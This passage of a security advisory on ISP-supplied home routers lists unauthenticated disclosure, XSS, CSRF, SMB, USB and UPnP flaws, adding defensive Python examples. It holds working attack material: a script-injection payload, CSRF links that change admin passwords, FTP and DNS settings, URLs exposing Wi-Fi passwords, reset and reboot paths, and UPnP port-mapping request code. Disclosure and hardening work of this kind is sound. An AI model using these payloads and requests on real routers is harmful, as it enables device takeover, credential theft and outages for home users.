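WANIP = "urn:schemas-upnp-org:service:WANIPConnection:1"
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed SSDP reply, in the shape a router sends back to an M-SEARCH.
SAMPLE_SSDP_REPLY = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"LOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    b"ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::" + WANIP.encode() + b"\r\n"
    b"\r\n"
)


def msearch(st: str = WANIP, mx: int = 2) -> bytes:
    """SSDP discovery datagram, sent to the multicast group 239.255.255.250:1900."""
    return (f"M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
            f'MAN: "ssdp:discover"\r\nMX: {mx}\r\nST: {st}\r\n\r\n').encode()


def parse_ssdp_reply(raw: bytes) -> dict:
    """Header names are case-insensitive; returned upper-cased. LOCATION is the
    description document from which the service's controlURL is read."""
    lines = raw.decode("latin-1").split("\r\n")
    if not lines or not lines[0].startswith("HTTP/1.1 200"):
        raise ValueError("not an SSDP 200 reply")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().upper()] = value.strip()
    return headers


def soap_request(service: str, action: str, args: dict) -> tuple:
    """Return (headers, body) for a UPnP control request."""
    fields = "".join(f"<{k}>{html.escape(str(v))}</{k}>" for k, v in args.items())
    body = ('<?xml version="1.0"?>'
            f'<s:Envelope xmlns:s="{SOAP_NS}" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:{action} xmlns:u="{service}">{fields}</u:{action}></s:Body></s:Envelope>')
    headers = {"Content-Type": 'text/xml; charset="utf-8"',
               "SOAPAction": f'"{service}#{action}"'}
    return headers, body


def add_port_mapping(ext_port: int, internal_client: str, int_port: int,
                     proto: str = "TCP", lease: int = 0) -> tuple:
    """Standard WANIPConnection:1 AddPortMapping arguments."""
    return soap_request(WANIP, "AddPortMapping", {
        "NewRemoteHost": "", "NewExternalPort": ext_port, "NewProtocol": proto,
        "NewInternalPort": int_port, "NewInternalClient": internal_client,
        "NewEnabled": 1, "NewPortMappingDescription": "example", "NewLeaseDuration": lease,
    })


def force_termination() -> tuple:
    return soap_request(WANIP, "ForceTermination", {})


def parse_soap_action(body: str) -> tuple:
    """Server side: pull (action, args) out of the envelope."""
    call = ET.fromstring(body).find(f"{{{SOAP_NS}}}Body")[0]
    action = call.tag.split("}", 1)[1]
    return action, {child.tag: (child.text or "") for child in call}


def igd_policy(action: str, args: dict, requester: str, lan: str) -> tuple:
    """What a hardened IGD should enforce before honouring a control request:
    only LAN hosts may call, mappings may only point at LAN hosts, and the
    disruptive ForceTermination is refused outright."""
    net = ipaddress.ip_network(lan)
    if ipaddress.ip_address(requester) not in net:
        return False, "control request from outside the LAN"
    if action == "ForceTermination":
        return False, "ForceTermination disabled"
    if action == "AddPortMapping":
        try:
            if ipaddress.ip_address(args.get("NewInternalClient", "")) not in net:
                return False, "mapping target outside the LAN"
        except ValueError:
            return False, "invalid NewInternalClient"
    return True, "ok"


def send_control(location: str, control_path: str, headers: dict, body: str) -> str:
    """POST the envelope to the control URL (network; not called by demo()).
    control_path must be the controlURL taken from the document at LOCATION."""
    loc = urlsplit(location)
    conn = http.client.HTTPConnection(loc.hostname, loc.port or 80, timeout=5)
    conn.request("POST", control_path, body=body.encode(), headers=headers)
    return conn.getresponse().read().decode("utf-8", "replace")


def demo() -> dict:
    headers = parse_ssdp_reply(SAMPLE_SSDP_REPLY)
    _, body = add_port_mapping(2222, "198.51.100.10", 22)  # target outside the LAN
    action, args = parse_soap_action(body)
    lan = "192.168.1.0/24"
    return {
        "location": headers["LOCATION"],
        "action": action,
        "external_target": igd_policy(action, args, "192.168.1.20", lan),
        "lan_target": igd_policy(action, {**args, "NewInternalClient": "192.168.1.20"},
                                 "192.168.1.20", lan),
        "wan_caller": igd_policy(action, args, "203.0.113.7", lan),
        "force_termination": igd_policy("ForceTermination", {}, "192.168.1.20", lan),
    }
```

The affected devices answer the `add_port_mapping` request with `NewInternalClient` set to an address outside the LAN, which is the "open critical ports, even towards hosts outside the LAN" case above; `igd_policy` is what refusing it looks like. Binding the UPnP listener to the LAN interface only, or disabling UPnP, removes the unauthenticated surface entirely.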
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: Home Station BHS-RTA
Tested firmwares: v1.1.3
Comments: Common router that Spanish ISP Telefónica used to give away to their ADSL/VDSL customers
--------------------------------------------------------------------------------------------
--------------------------------- Information Disclosure ---------------------------------
* Description: The Observa Telecom Home Station BHS-RTA web interface allows an external attacker to obtain critical information without any login process.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121781 (http://osvdb.org/show/osvdb/121781), OSVDB-121782 (http://osvdb.org/show/osvdb/121782), OSVDB-121783 (http://osvdb.org/show/osvdb/121783) and OSVDB-121784 (http://osvdb.org/show/osvdb/121784)
* PoC: Without any login process, an external attacker is able to obtain critical information such as the WLAN password and settings, the Internet configuration, a list of connected clients, etc.
By accessing the following URL, the browser shows the WLAN configuration, including the passwords:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnWifiJSON.txt&var:page=returnWifiJSON.txt&_=1430086147101
By accessing the following URL, the browser shows a list of connected clients, including their IP and MAC addresses:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnDevicesJSON.txt&var:page=returnDevicesJSON.txt&_=1430086147101
By accessing the following URL, the browser shows the Internet configuration parameters:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnInternetJSON.txt&var:page=returnInternetJSON.txt&_=1430086980134
By accessing the following URL, the browser shows whether the administrator password has been changed or is still the default one:
http://192.168.1.1/cgi-bin/webproc?getpage=html/gui/APIS/returnPasswordJSON.txt&var:page=returnPasswordJSON.txt&_=1430086980134
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or terminating any WAN connection (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts that are not inside the LAN.
============================================================================================
============================================================================================
Manufacturer: Observa Telecom
Model: VH4032N
Tested firmwares: VH4032N_V0.2.35
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121793 (http://osvdb.org/show/osvdb/121793)
* PoC: The threat is found in some input fields that let special characters be written in and then display the added information in the web interface itself. For example, the SSID input field is vulnerable if the following code is written in:
'; </script><script>alert(1)</script><script>//
The malicious code will be executed throughout the whole web interface.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Every input field is vulnerable to Cross Site Request Forgery (CSRF) attacks.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121791 (http://osvdb.org/show/osvdb/121791) and OSVDB-121792 (http://osvdb.org/show/osvdb/121792)
* PoC: Although a token tied to the session ID exists, configuration settings can be modified without it. Thus, every input field is vulnerable to CSRF attacks. For example, if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link:
http://192.168.0.1/en_US/administration.cgi?usrPassword=newpass
If an attacker wants to change the FTP server configuration settings, such as the password and whether remote FTP connections from the WAN are allowed, he may use the following link:
http://192.168.0.1/en_US/config_ftp.cgi?ftpEnabled=1&ftpUserName=vodafone&ftpPassword=vulnpass&ftpPort=21&ftpAclMode=2
--------------------------------------------------------------------------------------------
------------------------ Bypass Authentication using SMB Symlinks ------------------------
* Description: An external attacker, without any login process, is able to download the whole router kernel filesystem, including all the configuration information and the user account information files, by creating symbolic links through the router's Samba server.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121790 (http://osvdb.org/show/osvdb/121790)
* PoC: An unauthenticated attacker is able to download the whole router filesystem by connecting to the Samba server. There is a shared service (called storage) in which it is possible to create symbolic links to the router filesystem and download the content. For example, a symlink to / is possible and allows the attacker to freely view and download the entire filesystem.
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121794 (http://osvdb.org/show/osvdb/121794)
* PoC: If a USB storage device is hooked up to the router, an external attacker is able to download and modify its content and upload new files, without any login process. In order to do so, the attacker only needs to access the router IP address on port 9000.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify the WPS configuration by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122386 (http://osvdb.org/show/osvdb/122386)
* PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers.
The device supports multiple UPnP actions, such as changing the WPS configuration or resetting the AP to default settings.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG553
Tested firmwares: V100R001C03B043SP01
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC: If a USB storage device is hooked up to the router, an external attacker is able to download and modify its content and upload new files, without any login process. In order to do so, the attacker only needs to access the router IP address on port 9000.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication ----------------------------------
* Description: An external attacker, without any login process, is able to reset the router settings to the default ones and to cause a permanent denial of service.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC: Without any login process, an attacker is able to cause a permanent denial of service by repeatedly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to the default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router using the default credentials. In both attacks the router replies with an HTTP 400 status code, but the reboot or the configuration reset is nevertheless executed.
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the WiFi->Básico (WiFi->Basic) subdirectory allows script code injection.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. For example, if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link:
http://192.168.0.1/userpasswd.cgi?usrPassword=newpassword
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or terminating any WAN connection (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts that are not inside the LAN.
============================================================================================
============================================================================================
Manufacturer: Huawei
Model: HG556a
Tested firmwares: V100R001C10B077
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121778 (http://osvdb.org/show/osvdb/121778)
* PoC: If a USB storage device is hooked up to the router, an external attacker is able to download and modify its content and upload new files, without any login process. In order to do so, the attacker only needs to access the router IP address on port 9000.
--------------------------------------------------------------------------------------------
--------------------------------- Bypass Authentication ----------------------------------
* Description: An external attacker, without any login process, is able to reset the router settings to the default ones and to cause a permanent denial of service.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121779 (http://osvdb.org/show/osvdb/121779)
* PoC: Without any login process, an attacker is able to cause a permanent denial of service by repeatedly accessing the /rebootinfo.cgi URL. The attacker is also able to force the router to reset to the default configuration settings by accessing the /restoreinfo.cgi URL. After that, the attacker is able to log into the router using the default credentials. In both attacks the router asks for a username and password and returns an HTTP 401 (Unauthorized) status code, but after multiple requests are sent it replies with an HTTP 400 status code and executes the action.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment.
OSVDB-121775 (http://osvdb.org/show/osvdb/121775)
* PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. For example, if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link:
http://192.168.1.23/es_ES/expert/userpasswd.cgi?usrPassword=vodafone1&sSuccessPage=administration.htm&sErrorPage=administration.htm
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121776 (http://osvdb.org/show/osvdb/121776)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the WiFi->Nombre (WiFi->Name) subdirectory allows script code injection. The script execution can be clearly seen in different subdirectories such as diagnostic.htm and config_wifi.htm.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121777 (http://osvdb.org/show/osvdb/121777)
* PoC: An external attacker is able to inject malicious code into the router website without any login process. This is achieved by sending a DHCP Request PDU containing the malicious script in the hostname parameter. The malicious code is stored in the Dispositivos Conectados (Connected Devices) table. Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122385 (http://osvdb.org/show/osvdb/122385)
* PoC: The Universal Plug and Play (UPnP) protocol is enabled by default on the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or terminating any WAN connection (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts that are not inside the LAN.
============================================================================================
============================================================================================
Manufacturer: Astoria
Model: ARV7510
Tested firmwares: 00.03.41
Comments: Common router that ISP Vodafone used to give away to their customers
--------------------------------------------------------------------------------------------
---------------------------- USB Device Bypass Authentication ----------------------------
* Description: An external attacker, without any login process, is able to view, modify, delete and upload new files to the USB storage device connected to the router.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121773 (http://osvdb.org/show/osvdb/121773)
* PoC: If a USB storage device is hooked up to the router, an external attacker is able to download and modify its content and upload new files, without any login process. In order to do so, the attacker only needs to access the router IP address on port 9000.
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121774 (http://osvdb.org/show/osvdb/121774) and OSVDB-121888 (http://osvdb.org/show/osvdb/121888)
* PoC: Every input field is vulnerable to Cross Site Request Forgery attacks. For example, if an attacker wants to change the administrator password, he may use the following URL to do so once the victim opens the link:
http://192.168.1.22/cgi-bin/setup_pass.cgi?pwdOld=vodafone&pwdNew=vodafone1&pwdCfm=vodafone1
============================================================================================
============================================================================================
Manufacturer: Amper
Model: ASL-26555
Tested firmwares: v2.0.0.37B_ES
Comments: Common router that Spanish ISP Telefónica used to give away to their customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121770 (http://osvdb.org/show/osvdb/121770) and OSVDB-121771 (http://osvdb.org/show/osvdb/121771)
* PoC: Besides the main web configuration interface (port 80), there is a much more advanced one on port 8000 in which every input field is vulnerable to CSRF. For example, if an attacker wants to change the DNS servers, he may use the following URL to do so once the victim opens the link:
http://192.168.1.21:8000/ADVANCED/ad_dns.xgi?&set/dproxy/enable=0&set/dns/mode=4&set/dns/server/primarydns=80.58.61.251&set/dns/server/secondarydns=80.58.61.251&CMT=0&EXE=DNS
It is also possible for an attacker to change the default router administrator password by sending the victim this URL: (URL omitted for size reasons)
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121772 (http://osvdb.org/show/osvdb/121772)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The vulnerable input field is in the basic web interface on port 80. The script execution can be clearly seen within the Advanced->WLAN Access Rules subdirectory of the advanced web interface on port 8000.
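Every CSRF entry in this advisory (VH4032N, HG553, HG556a, ARV7510, ASL-26555 and the later Netgear and Zyxel ones) comes down to the same defect: a state-changing CGI accepts a request carrying the victim's session cookie regardless of how that request was triggered, and on the VH4032N a session token exists but is not enforced. The following added example, which is not code from the advisory or from any vendor firmware, models the vulnerable handler beside a hardened one so the difference can be exercised; the router origin, the placeholder password and the handler names are constructed for the example.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

ROUTER_ORIGIN = "http://192.168.0.1"   # LAN address used in the advisory's HG553 PoC


@dataclass
class RouterState:
    admin_password: str = "oldpass"    # constructed placeholder, not a real default


@dataclass
class Session:
    # Per-login secret that the router embeds in every configuration form it serves.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


def parse_request(url: str, body: str = "") -> dict:
    """Merge query-string and form-body parameters the way a CGI handler sees them."""
    params = {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}
    if body:
        params.update({k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()})
    return params


def userpasswd_vulnerable(state, session, method, url, body="", origin=None):
    """Models the affected handlers: any request that arrives with the session cookie
    changes the password, GET included, and the token is only checked when the
    client happens to send one (the VH4032N observation)."""
    params = parse_request(url, body)
    if "token" in params and not hmac.compare_digest(params["token"], session.csrf_token):
        return 403
    if "usrPassword" not in params:
        return 400
    state.admin_password = params["usrPassword"]
    return 200


def userpasswd_hardened(state, session, method, url, body="", origin=None):
    """Hardened handler: state changes only over POST, the per-session token is
    mandatory and compared in constant time, and an Origin header that does not
    match the router (browsers send it on cross-site form posts) is rejected."""
    if method != "POST":
        return 405
    if origin is not None and origin != ROUTER_ORIGIN:
        return 403
    params = parse_request(url, body)
    if not hmac.compare_digest(params.get("token", ""), session.csrf_token):
        return 403
    if "usrPassword" not in params:
        return 400
    state.admin_password = params["usrPassword"]
    return 200


def cross_site_get(state, session, handler):
    """The advisory's link, opened by a victim whose browser still holds the session cookie."""
    return handler(state, session, "GET", ROUTER_ORIGIN + "/userpasswd.cgi?usrPassword=newpassword")


def cross_site_post(state, session, handler):
    """An auto-submitted form on a foreign page: same parameters, no token, foreign Origin."""
    return handler(state, session, "POST", ROUTER_ORIGIN + "/userpasswd.cgi",
                   body="usrPassword=newpassword", origin="http://attacker.invalid")


def legitimate_change(state, session, new_password):
    """The router's own form: POST carrying the embedded token and a same-origin header."""
    body = f"usrPassword={new_password}&token={session.csrf_token}"
    return userpasswd_hardened(state, session, "POST", ROUTER_ORIGIN + "/userpasswd.cgi",
                               body=body, origin=ROUTER_ORIGIN)
```

Rejecting non-POST methods for state changes alone would already neutralise every URL-based PoC in this advisory; the token and Origin checks cover the form-post variant used against the Netgear CG3100D.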
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121224 (http://osvdb.org/show/osvdb/121224)
* PoC: An external attacker is able to inject malicious code into the router website without any login process. This is achieved by sending a DHCP Request PDU containing the malicious script in the hostname parameter. The malicious code is stored in the Connected Clients table (Setup->Local Network). Once the victim views this list, the script is executed.
--------------------------------------------------------------------------------------------
-------------------------------- Universal Plug and Play ---------------------------------
* Description: An unauthenticated attacker is able to modify firewall rules and carry out a persistent denial of service by using the supported Universal Plug and Play protocol.
* Report status: Reported to MITRE on 2015-05-21. Waiting for assignment. OSVDB-122388 (http://osvdb.org/show/osvdb/122388)
* PoC: The Universal Plug and Play (UPnP) protocol is supported by the device. This protocol has many weaknesses, such as the lack of an authentication process, which can be exploited by attackers. The device supports multiple UPnP actions, such as changing the firewall rules (AddPortMapping) or terminating any WAN connection (ForceTermination). These actions allow an attacker to carry out a persistent denial of service (the router needs to be factory reset to work properly again) or open critical ports, even for remote hosts that are not inside the LAN.
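The DHCP Request injection reported for the ASL-26555 above, and for the other devices whose DHCP client tables render the hostname, works because the name a client sends in its DHCP request is copied verbatim into the connected-clients page. The following added example is not code from the advisory or from any vendor firmware: it shows that vulnerable rendering beside an output-encoded one, plus a lease-file check a defender can run to spot hostnames no real client should send; the dnsmasq-style lease lines, MAC addresses and host names are constructed.

```python
import html
import re
from dataclasses import dataclass
from typing import List

# Hostname label per RFC 1123: letters, digits and hyphen, no leading or trailing hyphen.
# Underscore is tolerated because many Windows and IoT clients send it; markup characters
# such as < > " ' & / are never legitimate in DHCP option 12 (host name).
LABEL_RE = re.compile(r"^[A-Za-z0-9_](?:[A-Za-z0-9_-]{0,61}[A-Za-z0-9_])?$")


@dataclass
class Lease:
    expiry: int
    mac: str
    ip: str
    hostname: str  # taken verbatim from option 12 of the client's DHCP request


# Constructed sample in dnsmasq lease-file layout: expiry, MAC, IP, hostname, client-id.
# '*' is what dnsmasq writes when the client sent no hostname at all.
SAMPLE_LEASES_TXT = """\
1430086147 00:11:22:33:44:55 192.168.1.33 laptop-juan 01:00:11:22:33:44:55
1430086200 66:77:88:99:aa:bb 192.168.1.34 * 01:66:77:88:99:aa:bb
1430086260 cc:dd:ee:ff:00:11 192.168.1.35 <script>alert(1)</script> 01:cc:dd:ee:ff:00:11
"""


def parse_leases(text: str) -> List[Lease]:
    """Parse whitespace-separated lease lines (constructed layout; real files may differ)."""
    leases = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        hostname = "" if parts[3] == "*" else parts[3]
        leases.append(Lease(int(parts[0]), parts[1], parts[2], hostname))
    return leases


def is_valid_hostname(name: str) -> bool:
    """True only for names that could be a legitimate DHCP client hostname."""
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.match(label) for label in name.split("."))


def render_clients_vulnerable(leases: List[Lease]) -> str:
    """How the affected pages behave: the hostname is concatenated into the HTML as-is."""
    rows = [f"<tr><td>{l.hostname or '(unknown)'}</td><td>{l.ip}</td><td>{l.mac}</td></tr>"
            for l in leases]
    return "<table>" + "".join(rows) + "</table>"


def render_clients_hardened(leases: List[Lease]) -> str:
    """Output-encode every client-controlled field and mark names that cannot be real."""
    rows = []
    for l in leases:
        name = l.hostname or "(unknown)"
        if l.hostname and not is_valid_hostname(l.hostname):
            name = "[invalid hostname] " + l.hostname   # still shown, but only after escaping
        rows.append("<tr><td>{}</td><td>{}</td><td>{}</td></tr>".format(
            html.escape(name, quote=True), html.escape(l.ip), html.escape(l.mac)))
    return "<table>" + "".join(rows) + "</table>"


def suspicious_leases(leases: List[Lease]) -> List[Lease]:
    """Detection: leases whose hostname carries characters no DHCP client should send."""
    return [l for l in leases if l.hostname and not is_valid_hostname(l.hostname)]
```

Validating the hostname on the way in (rejecting or replacing it at lease time) and escaping on the way out are complementary; the render functions above show why only the second one stops the stored script from running in the administrator's browser.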
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: AR-5387un
Tested firmwares: A731-410JAZ-C04_R02
Comments: Common router that ISP Jazztel used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless->Security and Wireless->MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC: An external attacker is able to inject malicious code into the router website without any login process. This is achieved by sending a DHCP Request PDU containing the malicious script in the hostname parameter. The malicious code is stored in the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Netgear
Model: CG3100D
Tested firmwares: v1.05.05
Comments: Common router that ISP ONO used to give away to their customers
--------------------------------------------------------------------------------------------
------------------------------- Cross Site Request Forgery -------------------------------
* Description: Multiple Cross Site Request Forgery (CSRF) vulnerabilities within the router website allow an external attacker to carry out actions such as changing the administrator password.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121795 (http://osvdb.org/show/osvdb/121795)
* PoC: Every input field is vulnerable to CSRF. An attacker may write a malicious website that triggers a POST request to the victim's router. When a website with that code is accessed, the POST request is sent and the attack is done. It is also possible for an attacker to reset the victim's router to default settings by using custom source code. (Source code has been omitted for size reasons.)
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121780 (http://osvdb.org/show/osvdb/121780)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the Red Inalambrica->Nombre (Wireless Network->Name) subdirectory allows script code injection. The script execution can be clearly seen in different subdirectories such as Básico->Inicio (Basic->Home), Avanzado->Inicio (Advanced->Home) and Avanzado->Estado del router (Advanced->Router status).
============================================================================================
============================================================================================
Manufacturer: Comtrend
Model: VG-8050
Tested firmwares: SB01-S412TLF-C07_R03
Comments: Common router that Spanish ISP Telefonica used to give away to their customers
--------------------------------------------------------------------------------------------
----------------------------- Persistent Cross Site Scripting ----------------------------
* Description: Some input fields within the router website are vulnerable to Cross-site Scripting (XSS) attacks, allowing an attacker to execute malicious code.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121218 (http://osvdb.org/show/osvdb/121218)
* PoC: Although most of the input fields do not allow special characters to be written in, there are still some in which an XSS can be performed. For example, the SSID field within the Wireless->Basic subdirectory allows script code injection. The script execution can be clearly seen within the Wireless->Security and Wireless->MAC Filter subdirectories.
--------------------------------------------------------------------------------------------
-------------------------- Unauthenticated Cross Site Scripting --------------------------
* Description: Unauthenticated Cross-site Scripting (XSS) allows an attacker to inject malicious code into the router configuration website by sending a DHCP Request PDU.
* Report status: Reported to MITRE on 2015-05-07. Waiting for assignment. OSVDB-121215 (http://osvdb.org/show/osvdb/121215)
* PoC: An external attacker is able to inject malicious code into the router website without any login process. This is achieved by sending a DHCP Request PDU containing the malicious script in the hostname parameter. The malicious code is stored in the DHCP Leases table (Device Info -> DHCP). Once the victim views this list, the script is executed.
============================================================================================
============================================================================================
Manufacturer: Zyxel
Model: P 660HW-B1A
